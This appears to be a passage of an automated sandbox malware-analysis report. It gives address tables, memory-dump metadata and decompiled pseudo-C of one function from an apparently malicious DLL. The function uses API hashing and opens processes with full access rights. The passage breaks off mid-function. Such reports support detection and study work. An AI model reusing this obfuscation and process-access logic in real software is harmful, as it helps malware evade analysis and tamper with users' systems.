                                                                                                                                                  0x6e9aa8f2
                                                                                                                                                  0x6e9aa8f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa90b
                                                                                                                                                  0x6e9aa926
                                                                                                                                                  0x6e9aa928
                                                                                                                                                  0x6e9aa93b
                                                                                                                                                  0x6e9aa93d
                                                                                                                                                  0x6e9aa93f
                                                                                                                                                  0x6e9aa95a
                                                                                                                                                  0x6e9aa95a
                                                                                                                                                  0x6e9aa95e
                                                                                                                                                  0x6e9aa960
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa962
                                                                                                                                                  0x6e9aa965
                                                                                                                                                  0x6e9aa986
                                                                                                                                                  0x6e9aa9a5
                                                                                                                                                  0x6e9aa9ab
                                                                                                                                                  0x6e9aa9ae
                                                                                                                                                  0x6e9aa9b3
                                                                                                                                                  0x6e9aa9b4
                                                                                                                                                  0x6e9aa9b8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa9c0
                                                                                                                                                  0x6e9aa9c0
                                                                                                                                                  0x6e9aa9c2
                                                                                                                                                  0x6e9aa9ce
                                                                                                                                                  0x6e9aa9da
                                                                                                                                                  0x6e9aa9e4
                                                                                                                                                  0x6e9aa9e7
                                                                                                                                                  0x6e9aa9ea
                                                                                                                                                  0x6e9aa9ee
                                                                                                                                                  0x6e9aa9f5
                                                                                                                                                  0x6e9aa9f9
                                                                                                                                                  0x6e9aa9fd
                                                                                                                                                  0x6e9aa9fe
                                                                                                                                                  0x6e9aaa02
                                                                                                                                                  0x6e9aaa07
                                                                                                                                                  0x6e9aaa0c
                                                                                                                                                  0x6e9aaa10
                                                                                                                                                  0x6e9aaa14
                                                                                                                                                  0x6e9aaa1a
                                                                                                                                                  0x6e9aaa20
                                                                                                                                                  0x6e9aaa26
                                                                                                                                                  0x6e9aaa2c
                                                                                                                                                  0x6e9aaa31
                                                                                                                                                  0x6e9aaa32
                                                                                                                                                  0x6e9aaa32
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa9c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa965
                                                                                                                                                  0x6e9aa943
                                                                                                                                                  0x6e9aa954
                                                                                                                                                  0x6e9aa956
                                                                                                                                                  0x6e9aa958
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa958
                                                                                                                                                  0x6e9aa96b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa96b
                                                                                                                                                  0x6e9aa76f
                                                                                                                                                  0x6e9aa772
                                                                                                                                                  0x6e9aa774
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa77c
                                                                                                                                                  0x6e9aa77c
                                                                                                                                                  0x6e9aa77e
                                                                                                                                                  0x6e9aa77e
                                                                                                                                                  0x6e9aa78f
                                                                                                                                                  0x6e9aa791
                                                                                                                                                  0x6e9aa794
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa88a
                                                                                                                                                  0x6e9aa88b
                                                                                                                                                  0x6e9aa88d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa88d
                                                                                                                                                  0x6e9aa79a
                                                                                                                                                  0x6e9aa79d
                                                                                                                                                  0x6e9aa7a7
                                                                                                                                                  0x6e9aa7ac
                                                                                                                                                  0x6e9aa7ae
                                                                                                                                                  0x6e9aa7b4
                                                                                                                                                  0x6e9aa7bb
                                                                                                                                                  0x6e9aa7bf
                                                                                                                                                  0x6e9aa7c4
                                                                                                                                                  0x6e9aa7c8
                                                                                                                                                  0x6e9aac03
                                                                                                                                                  0x6e9aac17
                                                                                                                                                  0x6e9aac3a
                                                                                                                                                  0x6e9aac3f
                                                                                                                                                  0x6e9aac3f
                                                                                                                                                  0x6e9aa7df
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7e4
                                                                                                                                                  0x6e9aa7ea
                                                                                                                                                  0x6e9aa7ef
                                                                                                                                                  0x6e9aa7f1
                                                                                                                                                  0x6e9aa7f6
                                                                                                                                                  0x6e9aa7fd
                                                                                                                                                  0x6e9aa802
                                                                                                                                                  0x6e9aa804
                                                                                                                                                  0x6e9aabc1
                                                                                                                                                  0x6e9aabd2
                                                                                                                                                  0x6e9aabec
                                                                                                                                                  0x6e9aabf1
                                                                                                                                                  0x6e9aabf1
                                                                                                                                                  0x6e9aa81a
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa81f
                                                                                                                                                  0x6e9aa833
                                                                                                                                                  0x6e9aa851
                                                                                                                                                  0x6e9aa856
                                                                                                                                                  0x6e9aa866
                                                                                                                                                  0x6e9aa883
                                                                                                                                                  0x6e9aa885
                                                                                                                                                  0x6e9aa885
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa79d
                                                                                                                                                  0x6e9aa653
                                                                                                                                                  0x6e9aa653
                                                                                                                                                  0x6e9aa655
                                                                                                                                                  0x6e9aa65c
                                                                                                                                                  0x6e9aa66a
                                                                                                                                                  0x6e9aa66c
                                                                                                                                                  0x6e9aa66f
                                                                                                                                                  0x6e9aa676
                                                                                                                                                  0x6e9aa678
                                                                                                                                                  0x6e9aa6a9
                                                                                                                                                  0x6e9aa6b8
                                                                                                                                                  0x6e9aa6ba
                                                                                                                                                  0x6e9aa6bc
                                                                                                                                                  0x6e9aa6da
                                                                                                                                                  0x6e9aa6dc
                                                                                                                                                  0x6e9aa6de
                                                                                                                                                  0x6e9aa6f1
                                                                                                                                                  0x6e9aa710
                                                                                                                                                  0x6e9aa716
                                                                                                                                                  0x6e9aa719
                                                                                                                                                  0x6e9aa730
                                                                                                                                                  0x6e9aa74c
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa74e
                                                                                                                                                  0x6e9aa6de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9aa6bc
                                                                                                                                                  0x6e9aa67c
                                                                                                                                                  0x6e9aa67c
                                                                                                                                                  0x6e9aa67e
                                                                                                                                                  0x6e9aa68f
                                                                                                                                                  0x6e9aa691
                                                                                                                                                  0x6e9aa693
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: daeae20ad8a60282741212b4c1060d354236a72f30242b1771ab4dc4bdd0796e
                                                                                                                                                  • Instruction ID: 672e73adae4e643cf96e1ffdd48bc33d19e8325bd20bf5168ae5ebe397150a7b
                                                                                                                                                  • Opcode Fuzzy Hash: daeae20ad8a60282741212b4c1060d354236a72f30242b1771ab4dc4bdd0796e
                                                                                                                                                  • Instruction Fuzzy Hash: 421272715082019FC754DFA8C884AAEB7E9EFD5718F108E1DEA99972A1DB70DD01CF42
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E6E9A8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				signed int* _t173;
                                                                                                                                                  				signed int* _t178;
                                                                                                                                                  				void* _t180;
                                                                                                                                                  				void* _t181;
                                                                                                                                                  				intOrPtr* _t188;
                                                                                                                                                  				signed int _t202;
                                                                                                                                                  				intOrPtr* _t211;
                                                                                                                                                  				intOrPtr* _t212;
                                                                                                                                                  				intOrPtr* _t217;
                                                                                                                                                  				signed int* _t218;
                                                                                                                                                  				void* _t219;
                                                                                                                                                  				void* _t220;
                                                                                                                                                  				void* _t237;
                                                                                                                                                  				void* _t238;
                                                                                                                                                  				signed int* _t246;
                                                                                                                                                  				void* _t247;
                                                                                                                                                  				signed int* _t258;
                                                                                                                                                  				intOrPtr* _t269;
                                                                                                                                                  				signed int* _t277;
                                                                                                                                                  				intOrPtr* _t279;
                                                                                                                                                  				void* _t283;
                                                                                                                                                  				void* _t285;
                                                                                                                                                  				void* _t287;
                                                                                                                                                  				signed int* _t296;
                                                                                                                                                  				void* _t299;
                                                                                                                                                  				signed int* _t308;
                                                                                                                                                  				intOrPtr* _t310;
                                                                                                                                                  				signed int _t315;
                                                                                                                                                  				intOrPtr _t317;
                                                                                                                                                  				signed int* _t322;
                                                                                                                                                  				signed int _t323;
                                                                                                                                                  				signed int _t324;
                                                                                                                                                  				void* _t343;
                                                                                                                                                  				void* _t414;
                                                                                                                                                  				signed int _t415;
                                                                                                                                                  				signed int* _t421;
                                                                                                                                                  				signed int _t427;
                                                                                                                                                  				intOrPtr* _t428;
                                                                                                                                                  				intOrPtr* _t429;
                                                                                                                                                  				signed int _t431;
                                                                                                                                                  				signed int _t433;
                                                                                                                                                  				signed int _t437;
                                                                                                                                                  				signed int _t438;
                                                                                                                                                  				signed int _t439;
                                                                                                                                                  				signed int _t442;
                                                                                                                                                  				void* _t443;
                                                                                                                                                  				signed int _t444;
                                                                                                                                                  				void* _t445;
                                                                                                                                                  				signed int _t446;
                                                                                                                                                  				intOrPtr* _t449;
                                                                                                                                                  
                                                                                                                                                  				 *_t449 = __ecx + 0x1c;
                                                                                                                                                  				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
                                                                                                                                                  				 *(_t449 + 4) = __ecx;
                                                                                                                                                  				 *(_t449 + 0x84) = 0;
                                                                                                                                                  				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t413 =  *(_t449 + 0x6c);
                                                                                                                                                  					E6E9AB658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
                                                                                                                                                  					if(E6E9AF4D0(_t449 + 0x24) == 0) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						( *(_t449 + 4))[0xb] = 0;
                                                                                                                                                  						E6E9AF654(_t449 + 0x24);
                                                                                                                                                  					}
                                                                                                                                                  					L60:
                                                                                                                                                  					_t317 = 0xffffffffffffffff;
                                                                                                                                                  					L62:
                                                                                                                                                  					if(_t317 != 0) {
                                                                                                                                                  						L65:
                                                                                                                                                  						return _t317;
                                                                                                                                                  					}
                                                                                                                                                  					if( *(_t449 + 0x84) != 0x20) {
                                                                                                                                                  						E6E9B2234(0x5dc, _t413, _t430);
                                                                                                                                                  						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					_t317 = 0xffffffffffffffff;
                                                                                                                                                  					goto L65;
                                                                                                                                                  					L3:
                                                                                                                                                  					__eflags =  *( *(_t449 + 4));
                                                                                                                                                  					if( *( *(_t449 + 4)) <= 0) {
                                                                                                                                                  						L21:
                                                                                                                                                  						__eflags =  *(_t449 + 0x20);
                                                                                                                                                  						if( *(_t449 + 0x20) <= 0) {
                                                                                                                                                  							L33:
                                                                                                                                                  							E6E9AF654(_t449 + 0x24);
                                                                                                                                                  							_t173 =  *(_t449 + 4);
                                                                                                                                                  							__eflags = _t173[0xb];
                                                                                                                                                  							if(_t173[0xb] == 0) {
                                                                                                                                                  								L46:
                                                                                                                                                  								 *((intOrPtr*)(_t449 + 8)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t449 + 0xc)) = 0;
                                                                                                                                                  								E6E9AF584(_t449 + 0x14, 0);
                                                                                                                                                  								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
                                                                                                                                                  								 *((intOrPtr*)(_t449 + 0x38)) = 0;
                                                                                                                                                  								E6E9AF584(_t449 + 0x40, 0);
                                                                                                                                                  								_t178 =  *(_t449 + 4);
                                                                                                                                                  								_t414 = 0x40;
                                                                                                                                                  								__eflags = _t178[6] - 0x40;
                                                                                                                                                  								_t415 =  <  ? _t178[6] : _t414;
                                                                                                                                                  								 *(_t449 + 0x80) = _t415;
                                                                                                                                                  								__eflags = _t415;
                                                                                                                                                  								if(_t415 <= 0) {
                                                                                                                                                  									L57:
                                                                                                                                                  									_t413 = E6E9AF4BC(_t449 + 0x14, 0);
                                                                                                                                                  									_t180 = E6E9B2908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
                                                                                                                                                  									_t132 = _t180 - 0x80; // -128
                                                                                                                                                  									_t181 = _t132;
                                                                                                                                                  									__eflags = _t181 - 0x3f;
                                                                                                                                                  									_t315 =  <=  ? _t181 : _t180;
                                                                                                                                                  									__eflags = _t315 - 0x102;
                                                                                                                                                  									if(_t315 == 0x102) {
                                                                                                                                                  										L59:
                                                                                                                                                  										E6E9AB5C4(_t449 + 0x34);
                                                                                                                                                  										E6E9AB5C4(_t449 + 8);
                                                                                                                                                  										goto L60;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _t315 - 0x3f;
                                                                                                                                                  									if(_t315 <= 0x3f) {
                                                                                                                                                  										__eflags = _t315 << 2;
                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6E9AF4BC( *(_t449 + 4), _t315 << 2)));
                                                                                                                                                  										_t188 = E6E9AF4BC( *(_t449 + 0x7c), _t315 << 2);
                                                                                                                                                  										_t413 =  *(_t449 + 4);
                                                                                                                                                  										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
                                                                                                                                                  										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
                                                                                                                                                  										E6E9AB5C4(_t449 + 0x34);
                                                                                                                                                  										E6E9AB5C4(_t449 + 8);
                                                                                                                                                  										goto L62;
                                                                                                                                                  									}
                                                                                                                                                  									goto L59;
                                                                                                                                                  								}
                                                                                                                                                  								_t446 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									E6E9ACA8C(_t449 + 0x4c);
                                                                                                                                                  									_t413 = 0;
                                                                                                                                                  									_t343 = _t449 + 0x4c;
                                                                                                                                                  									 *((char*)(_t343 + 4)) = 0;
                                                                                                                                                  									 *((intOrPtr*)(_t343 + 0x20)) = 0;
                                                                                                                                                  									__eflags = E6E9AC280(_t343);
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828(_t449 + 0x14, E6E9AF4CC(_t449 + 0x10) + 4);
                                                                                                                                                  									 *((intOrPtr*)(E6E9AF4BC(_t449 + 0x14, E6E9AF4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
                                                                                                                                                  									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
                                                                                                                                                  									_t202 = E6E9B3064(0x60a28c5c, 0x3659ae1e);
                                                                                                                                                  									__eflags = _t202;
                                                                                                                                                  									if(_t202 == 0) {
                                                                                                                                                  										L51:
                                                                                                                                                  										_t413 =  *(_t449 + 0x6c);
                                                                                                                                                  										__eflags = _t413;
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _t413 - 0xffffffff;
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											E6E9AF828(_t449 + 0x40, E6E9AF4CC(_t449 + 0x3c) + 4);
                                                                                                                                                  											 *(E6E9AF4BC(_t449 + 0x40, E6E9AF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
                                                                                                                                                  											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
                                                                                                                                                  											E6E9ACD24(_t449 + 0x4c, __eflags);
                                                                                                                                                  											_t446 = _t446 + 1;
                                                                                                                                                  											__eflags = _t446 -  *(_t449 + 0x80);
                                                                                                                                                  											if(_t446 <  *(_t449 + 0x80)) {
                                                                                                                                                  												continue;
                                                                                                                                                  											}
                                                                                                                                                  											_t431 = 0;
                                                                                                                                                  											__eflags = 0;
                                                                                                                                                  											do {
                                                                                                                                                  												_t211 = E6E9AF4BC( *(_t449 + 4), _t431 * 4);
                                                                                                                                                  												_t212 = E6E9AF4BC(_t449 + 0x40, _t431 * 4);
                                                                                                                                                  												E6E9A8B58( *_t211, E6E9B02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
                                                                                                                                                  												_t431 = _t431 + 1;
                                                                                                                                                  												__eflags = _t431 -  *(_t449 + 0x80);
                                                                                                                                                  											} while (_t431 <  *(_t449 + 0x80));
                                                                                                                                                  											goto L57;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t413 = 0;
                                                                                                                                                  									_push(2);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(_t449 + 0x6c);
                                                                                                                                                  									_push( *((intOrPtr*)(_t449 + 0x78)));
                                                                                                                                                  									_push( *((intOrPtr*)(_t449 + 0x60)));
                                                                                                                                                  									_push(0xffffffff);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									__eflags = _t202;
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									goto L51;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9ACD24(_t449 + 0x4c, __eflags);
                                                                                                                                                  								goto L59;
                                                                                                                                                  							}
                                                                                                                                                  							_t427 =  *_t173;
                                                                                                                                                  							__eflags = _t427;
                                                                                                                                                  							if(_t427 <= 0) {
                                                                                                                                                  								goto L46;
                                                                                                                                                  							}
                                                                                                                                                  							_t430 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							_t322 =  &(_t173[1]);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t433 = _t430 * 4;
                                                                                                                                                  								_t217 = E6E9AF4BC(_t322, _t433);
                                                                                                                                                  								_t218 =  *(_t449 + 4);
                                                                                                                                                  								__eflags =  *_t217 - _t218[0xc];
                                                                                                                                                  								if( *_t217 == _t218[0xc]) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t430 = _t430 + 1;
                                                                                                                                                  								__eflags = _t430 - _t427;
                                                                                                                                                  								if(_t430 < _t427) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L46;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t430 - 0xffffffff;
                                                                                                                                                  							if(_t430 != 0xffffffff) {
                                                                                                                                                  								_t219 = E6E9AF4CC( *_t449);
                                                                                                                                                  								__eflags = _t219 - _t433;
                                                                                                                                                  								if(_t219 > _t433) {
                                                                                                                                                  									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
                                                                                                                                                  									_t247 = E6E9AF4CC( *_t449);
                                                                                                                                                  									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
                                                                                                                                                  									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0x90)) = E6E9AF4BC( *(_t449 + 4), _t433);
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0x8c)) = E6E9AF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                                                                  										E6E9B38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E9AF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                                                                  										_t449 = _t449 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc);
                                                                                                                                                  									_t421 =  *(_t449 + 4);
                                                                                                                                                  									_t75 =  &(_t421[6]);
                                                                                                                                                  									 *_t75 = _t421[6] - 1;
                                                                                                                                                  									__eflags =  *_t75;
                                                                                                                                                  								}
                                                                                                                                                  								_t220 = E6E9AF4CC(_t322);
                                                                                                                                                  								__eflags = _t220 - _t433;
                                                                                                                                                  								if(_t220 > _t433) {
                                                                                                                                                  									_t430 = 4 + _t430 * 4;
                                                                                                                                                  									_t237 = E6E9AF4CC(_t322);
                                                                                                                                                  									__eflags = _t237 - _t430;
                                                                                                                                                  									if(_t237 > _t430) {
                                                                                                                                                  										_t238 = E6E9AF4BC(_t322, _t433);
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0x94)) = E6E9AF4BC(_t322, _t430);
                                                                                                                                                  										E6E9B38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E9AF4CC(_t322) - _t430);
                                                                                                                                                  										_t449 = _t449 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828(_t322, E6E9AF4CC(_t322) + 0xfffffffc);
                                                                                                                                                  									_t246 =  *(_t449 + 4);
                                                                                                                                                  									 *_t246 =  *_t246 - 1;
                                                                                                                                                  									__eflags =  *_t246;
                                                                                                                                                  								}
                                                                                                                                                  								E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 4);
                                                                                                                                                  								 *(E6E9AF4BC( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
                                                                                                                                                  								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
                                                                                                                                                  								E6E9AF828(_t322, E6E9AF4CC(_t322) + 4);
                                                                                                                                                  								 *(E6E9AF4BC(_t322, E6E9AF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
                                                                                                                                                  								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
                                                                                                                                                  							}
                                                                                                                                                  							goto L46;
                                                                                                                                                  						}
                                                                                                                                                  						_t323 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							 *(_t449 + 0x7c) = _t323 * 4;
                                                                                                                                                  							_t428 = E6E9AF4BC(_t449 + 0x28, _t323 * 4);
                                                                                                                                                  							_t258 =  *(_t449 + 4);
                                                                                                                                                  							_t430 =  *_t258;
                                                                                                                                                  							__eflags = _t430;
                                                                                                                                                  							if(_t430 <= 0) {
                                                                                                                                                  								L29:
                                                                                                                                                  								_t437 = E6E9B3064(0x8e844d1e, 0x5c3654e3);
                                                                                                                                                  								__eflags = _t437;
                                                                                                                                                  								if(_t437 != 0) {
                                                                                                                                                  									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E9AF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
                                                                                                                                                  									__eflags = _t439;
                                                                                                                                                  									if(_t439 != 0) {
                                                                                                                                                  										E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 4);
                                                                                                                                                  										 *(E6E9AF4BC( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc)) = _t439;
                                                                                                                                                  										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
                                                                                                                                                  										_t269 = E6E9AF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
                                                                                                                                                  										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
                                                                                                                                                  										E6E9AF828( *((intOrPtr*)(_t449 + 0x74)), E6E9AF4CC( &(( *(_t449 + 4))[1])) + 4);
                                                                                                                                                  										 *((intOrPtr*)(E6E9AF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E9AF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
                                                                                                                                                  										_t277 =  *(_t449 + 4);
                                                                                                                                                  										 *_t277 =  *_t277 + 1;
                                                                                                                                                  										__eflags =  *_t277;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								goto L32;
                                                                                                                                                  							}
                                                                                                                                                  							_t438 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							 *(_t449 + 0x88) =  &(_t258[1]);
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t279 = E6E9AF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
                                                                                                                                                  								__eflags =  *_t279 -  *_t428;
                                                                                                                                                  								if( *_t279 ==  *_t428) {
                                                                                                                                                  									break;
                                                                                                                                                  								}
                                                                                                                                                  								_t438 = _t438 + 1;
                                                                                                                                                  								__eflags = _t438 - _t430;
                                                                                                                                                  								if(_t438 < _t430) {
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  								goto L29;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t438 - 0xffffffff;
                                                                                                                                                  							if(_t438 == 0xffffffff) {
                                                                                                                                                  								goto L29;
                                                                                                                                                  							}
                                                                                                                                                  							L32:
                                                                                                                                                  							_t323 = _t323 + 1;
                                                                                                                                                  							__eflags = _t323 -  *(_t449 + 0x20);
                                                                                                                                                  						} while (_t323 <  *(_t449 + 0x20));
                                                                                                                                                  						goto L33;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t324 = 0;
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							 *(_t449 + 0x64) = _t324 * 4;
                                                                                                                                                  							_t429 = E6E9AF4BC( *(_t449 + 0x7c), _t324 * 4);
                                                                                                                                                  							_t430 =  *(_t449 + 0x20);
                                                                                                                                                  							__eflags = _t430;
                                                                                                                                                  							if(_t430 <= 0) {
                                                                                                                                                  								L11:
                                                                                                                                                  								_t430 =  &(( *(_t449 + 4))[1]);
                                                                                                                                                  								_t283 = E6E9AF4CC( &(( *(_t449 + 4))[1]));
                                                                                                                                                  								__eflags = _t283 -  *(_t449 + 0x64);
                                                                                                                                                  								if(_t283 >  *(_t449 + 0x64)) {
                                                                                                                                                  									_t443 = 4 + _t324 * 4;
                                                                                                                                                  									_t299 = E6E9AF4CC(_t430);
                                                                                                                                                  									__eflags = _t299 - _t443;
                                                                                                                                                  									if(_t299 > _t443) {
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0x9c)) = E6E9AF4BC(_t430,  *(_t449 + 0x64));
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0x98)) = E6E9AF4BC(_t430, _t443);
                                                                                                                                                  										E6E9B38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E9AF4CC(_t430) - _t443);
                                                                                                                                                  										_t449 = _t449 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828(_t430, E6E9AF4CC(_t430) + 0xfffffffc);
                                                                                                                                                  									_t308 =  *(_t449 + 4);
                                                                                                                                                  									 *_t308 =  *_t308 - 1;
                                                                                                                                                  									__eflags =  *_t308;
                                                                                                                                                  								}
                                                                                                                                                  								_t442 = E6E9B3064(0x60a28c5c, 0xe96b154c);
                                                                                                                                                  								__eflags = _t442;
                                                                                                                                                  								if(_t442 != 0) {
                                                                                                                                                  									 *_t442( *(E6E9AF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
                                                                                                                                                  								}
                                                                                                                                                  								_t285 = E6E9AF4CC( *_t449);
                                                                                                                                                  								__eflags = _t285 -  *(_t449 + 0x64);
                                                                                                                                                  								if(_t285 >  *(_t449 + 0x64)) {
                                                                                                                                                  									_t445 = 4 + _t324 * 4;
                                                                                                                                                  									_t287 = E6E9AF4CC( *_t449);
                                                                                                                                                  									__eflags = _t287 - _t445;
                                                                                                                                                  									if(_t287 > _t445) {
                                                                                                                                                  										_t430 = E6E9AF4BC( *(_t449 + 4),  *(_t449 + 0x64));
                                                                                                                                                  										 *((intOrPtr*)(_t449 + 0xa0)) = E6E9AF4BC( *(_t449 + 4), _t445);
                                                                                                                                                  										E6E9B38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E9AF4CC( *_t449) - _t445);
                                                                                                                                                  										_t449 = _t449 + 0xc;
                                                                                                                                                  									}
                                                                                                                                                  									E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc);
                                                                                                                                                  									_t296 =  *(_t449 + 4);
                                                                                                                                                  									_t33 =  &(_t296[6]);
                                                                                                                                                  									 *_t33 = _t296[6] - 1;
                                                                                                                                                  									__eflags =  *_t33;
                                                                                                                                                  								}
                                                                                                                                                  								_t324 = _t324 - 1;
                                                                                                                                                  								__eflags = _t324;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							_t444 = 0;
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							while(1) {
                                                                                                                                                  								_t310 = E6E9AF4BC(_t449 + 0x28, _t444 * 4);
                                                                                                                                                  								__eflags =  *_t310 -  *_t429;
